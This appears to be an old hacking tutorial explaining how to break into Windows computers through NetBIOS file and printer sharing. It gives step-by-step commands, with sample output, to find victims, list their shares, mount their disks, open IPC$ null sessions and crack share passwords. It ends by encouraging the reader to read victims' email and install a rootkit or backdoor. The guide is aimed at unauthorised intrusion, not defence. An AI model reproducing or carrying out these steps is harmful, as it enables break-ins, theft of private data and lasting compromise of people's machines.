Under common request I decided to write a article about rooting the most common Operating system of all - Windows. I hope you find this imformative and such, Umm im not responsible for any dumb things you do and such, yeah.
 
Well rooting is a really big subject so i will just start with a very common yet highly powerful hack - netbios hack. This can easily be done
 
Searching for a victim
 
You may manually search for the victims by first using the nbtstat -a ipaddress and then net view \\ipaddress . If not use a port scanner for ports 137-139 or a scanner specially built for NetBios discovery - legion (available at cotse.com)
 
Lets Hack -Part 1 Remotely reading/writing to a victim's computer
 
Believe it or not but NetBIOS is the easiest method to break into somebody's computer. However its not all fun and games, if this person knows jack about security they will have disabled printer and file sharing, however it is on by default and most retards wont know what hit em'.
 
alright open up CMD or command prompt
 
The command that you will use to view the NetBIOS name is
 
c:\windows>nbtstat -a 203.195.136.156
 
Let suppose that the output comes out to be
 
NetBIOS Remote Machine Name Table
 
Name Type Status
-------------------------------------------------------------------------------------------------
user <00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered
MAC Address = 00-02-44-14-23-E6
 
The number <20> shows that the victim has enabled the File And Printer Sharing.
 
If you dont get 20 then you probably are out of luck, if you see Host not found then you have entered an invalid IP
 
Now our next step would be to view the drive or folders the victim is sharing.
 
We will use command
 
c:\windows>net view \\203.195.136.156
 
Let suppose we get the following output
 
Shared resources at \\203.195.136.156
Ryvius (Computer Name)
 
Share name  
 
CDISK Disk
 
The command completed successfully.
 
"DISK" shows that the victim is sharing a Disk named as CDISK . You may also get some additional information like
 
Shared resources at \\203.195.136.156
Ryvius
 
Share name  
 
HP-6L Print
 
"Print " shows that the victim is sharing a printer named as HP-6L
 
If we are able to share the victims hard disks or folders or printers we will be able to read write to the folders or hard disks or we may also be able to print anything on a remote printer ! Now let us share the victims computer's hard disk or printer.
 
Till now we know that there is a computer whose ip address happens to be 203.195.136.156 and on that computer File and printer sharing is enabled and the victim's hard disk 's name is CDISK.
 
After we have connected succesfully WE will have the C drive in plain sight just as if it was yours...
 
Lets do it.
 
We will use the NET command to do our work .
 
Let suppose we want to make a drive k: on our computer and connect it to victim's share we will issue the command
 
c:\windows>net use k: \\203.195.136.156\CDISK
 
You may replace k letter by any other letter.
 
If the command is successful we will get the confirmation - The command was completed successfullly
 
The command was completed successfully
 
Now just double click on the My Computer icon on your desktop and you will be a happy hacker!
 
You will notice that this is you victims DRIVE YAAAAA!
 
Cracking Share passwords
 
Sometimes for whatever reason people put passwords on a EXTREMLY weak protocol, However I did say it was weak right? This means it can be cracked
 
Windows 95
Windows 98
Windows Me
These OSs are easy to crack, just download the program PQWAK it is simple to use no explanation of the cracking features nessasary
 
Using IPC$ to hack Windows NT,2000,XP
 
Now you must be thinking of something that can crack share passwords on NT based operating systems like Windows NT and Windows 2000.
 
IPC$ is there to help us. It is not at all a password cracker . It is simply a string that tells the remote operating system to give guest access that is give access without asking for password.
 
We hackers use IPC$ in this way
 
c:\windows>net use k: \\123.123.123.123\ipc$ "" /user:""
 
Note that you wont have full access, Only limited access, you will have to get the Admin password from the SAM or guess it via SMB (Next lesson)
 
 
Penetrating in to the victim's computer
 
Well now i am assuming that you have full control of his computer, Download his MP3ss, read thier Email, and if you want to have alot of fun but a rootkit or backdoor on thier system incase they patch the NetBios vulnerability.